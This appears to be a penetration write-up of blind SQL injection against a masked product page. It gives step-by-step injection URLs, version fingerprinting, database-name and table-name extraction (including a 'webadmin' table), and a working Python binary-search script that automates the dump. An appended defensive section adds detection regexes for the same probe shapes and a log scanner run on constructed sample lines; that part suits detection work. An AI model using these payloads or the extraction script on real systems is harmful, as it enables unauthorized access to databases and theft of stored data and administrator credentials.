
Blind SQL injection on a certain website

http://www.xxxxxx.com/products.php?id=113

http://www.xxxxxx.com/products.php?id=114-1 (both pages display the same content, so the id is evaluated as an arithmetic expression)

Trying to close a quote:

http://www.xxxxxx.com/products.php?id=113' (the page shows an error)

Closing with " ' ) and similar characters, plus a trailing comment, also produces an error.

Testing shows that no quote closing is needed: the id is used as a bare number.


http://www.xxxxxx.com/products.php?id=113%20and%201=1 (page renders normally)

http://www.xxxxxx.com/products.php?id=113%20and%201=2 (page shows an error)

Using ORDER BY to test the number of columns:

http://www.xxxxxx.com/products.php?id=113 order by 2 (nothing is echoed back)

So this is presumably a blind injection.

http://www.xxxxxx.com/products.php?id=113%20and%20sleep(3) (the response is delayed)

Determining the database version:

http://www.xxxxxx.com/products.php?id=113%20and%20left(version(),6)=%275.5.46%27 (true, so the database is MySQL 5.5.46)

Determining the length of the current database name:

http://www.xxxxxx.com/products.php?id=113%20and%20length(database())>5

http://www.xxxxxx.com/products.php?id=113%20and%20length(database())=6

The length is 6.

Guessing the database name character by character:

http://www.xxxxxx.com/products.php?id=113%20and%20ascii(substr(database(),1,1))>114

http://www.xxxxxx.com/products.php?id=113%20and%20ascii(substr(database(),1,1))=115

The first character has code 115, i.e. 's'.

The database name is skytex.

Determining the length of each table name:

http://www.xxxxxx.com/products.php?id=113 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=5

The first table name is 5 characters long.

http://www.xxxxxx.com/products.php?id=113 and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=10

For the nth table, where {n} is the LIMIT offset (0 for the first table), test:

length((select table_name from information_schema.tables where table_schema=database() limit {n},1))>{m}

Dumping the table names character by character:

http://www.xxxxxx.com/products.php?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 0,1),1,1))=97

The first table is atype.

The second table is atypeainfo.

... ...

```python
import requests
import time

url = 'http://www.xxxxxx.com/products.php'  # no trailing slash, so the query string is appended directly to products.php
data = ''

payloads = list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123))  # ASCII codes of digits and upper/lower case letters, len == 62

# database name length is 6
# table name lengths: 1st 5, 2nd 10, 3rd 8, 4th 9
for i in range(1, 10):  # change the upper bound to the length of the value being extracted
    low = 0
    high = 61
    while high - low > 1:
        mid = (high + low) // 2
        m = payloads[mid]  # binary search: is the code of the i-th character greater than m?

        # payload = f"?id=113 and ascii(substr(database(),{i},1))>{m}"  # database name: skytex

        # payload = f"?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 0,1),{i},1))>{m}"  # 1st table: atype
        # payload = f"?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 1,1),{i},1))>{m}"  # 2nd table: atypeinfo
        # payload = f"?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 2,1),{i},1))>{m}"  # 3rd table: feedback
        payload = f"?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 3,1),{i},1))>{m}"  # 4th table: webadmin

        r = requests.get(url + payload)
        if 'PZ-CAP' in r.text:  # this string is present only when the page renders normally, i.e. the condition is true
            low = mid
        else:
            high = mid
    data += chr(payloads[high])
    print(data)
```
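A defender's counterpart to the probing above, added here as an example and not code from the original post: it parses constructed Common Log Format lines (the addresses and timestamps are made up), URL-decodes each query string, flags the probe shapes used in this write-up, and counts hits per source, since character-by-character binary search leaves a long run of near-identical requests from one address. The arithmetic probe `id=114-1` from the start of the post matches none of these signatures, which is why pattern matching is only a detection aid and the actual fix is a parameterized query.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe shapes seen in the write-up, applied to the URL-decoded query string.
SQLI_PATTERNS = {
    "boolean_probe":   re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),                  # and 1=1 / and 1=2
    "time_based":      re.compile(r"\bsleep\s*\(", re.I),                           # and sleep(3)
    "char_extraction": re.compile(r"\b(ascii|ord)\s*\(\s*(substr|mid)\s*\(", re.I),  # ascii(substr(..)) / ord(mid(..))
    "schema_enum":     re.compile(r"\binformation_schema\.", re.I),                 # table_name enumeration
}

# Common Log Format: ip ident user [timestamp] "method path protocol" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(path):
    """Return the names of every signature matching the decoded query string of one request path."""
    query = path.partition("?")[2]
    decoded = unquote_plus(query)  # %20 and '+' both become spaces, so encoded and plain probes look alike
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (ip, path, matches) for every request that trips at least one signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the scan
        matches = classify_request(m.group("path"))
        if matches:
            hits.append((m.group("ip"), m.group("path"), matches))
    return hits

def rank_sources(hits):
    """Flagged requests per source IP, highest first; binary-search extraction is many similar probes from one address."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])

# Constructed sample log lines (not from the original post); addresses come from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /products.php?id=113 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /products.php?id=113%20and%201=2 HTTP/1.1" 200 412
203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /products.php?id=113%20and%20sleep(3) HTTP/1.1" 200 412
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /products.php?id=113%20and%20ascii(substr(database(),1,1))>114 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /products.php?id=113+and+ord(mid((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))=97 HTTP/1.1" 200 5123
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /products.php?id=114 HTTP/1.1" 200 5100
"""
```

Running `scan_log(SAMPLE_LOG.splitlines())` flags four of the six requests, all from 203.0.113.5, and `rank_sources` puts that address at the top of the list.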

